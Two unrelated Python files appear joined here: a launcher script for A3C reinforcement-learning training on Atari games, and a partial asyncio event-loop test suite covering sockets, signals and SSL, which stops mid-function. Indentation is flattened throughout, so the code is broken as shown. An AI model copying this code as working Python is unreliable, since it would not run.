os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import atari_env
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
# add an option for enabling terminal prediction loss
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--tp',
type=float,
default=0.5,
metavar='TP',
help='terminal prediction aux loss weight (default: 0.5)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--terminal-prediction',
action="store_true",
default=False,
help='Enable or Disable Terminal Prediction Auxiliary Task') # this is our novel addition to the general A3C
parser.add_argument(
'--reward-prediction',
action="store_true",
default=False,
help='Enable or Disable Reward Prediction Auxiliary Task') # this is to compare UNREAL setting.
parser.add_argument(
'--render',
action="store_true",
default=False,
help='Enable or Disable Game Rendering') # added to watch test plays
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='Pong-v0',
metavar='ENV',
help='environment to train on (default: Pong-v0)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
    help='config file with per-environment crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
    help='use an optimizer with statistics shared across worker processes')
parser.add_argument(
'--load',
default=False,
metavar='L',
help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
    help='save the model whenever a test run matches or beats the previous high score')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
    help='shared optimizer to use: Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
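# Example invocations (hypothetical values, adjust to your own setup):
#   python main.py --env Pong-v0 --workers 8 --gpu-ids -1
#   python main.py --env PongDeterministic-v4 --workers 16 --gpu-ids 0 1 \
#       --terminal-prediction --tp 0.5 --optimizer Adam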
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
    shared_model = A3Clstm(env.observation_space.shape[0], env.action_space, args.terminal_prediction, args.reward_prediction)  # global model that all workers sync to and from
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
print(shared_model)
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
f = loop.create_task(
loop.connect_accepted_socket(
(lambda : proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
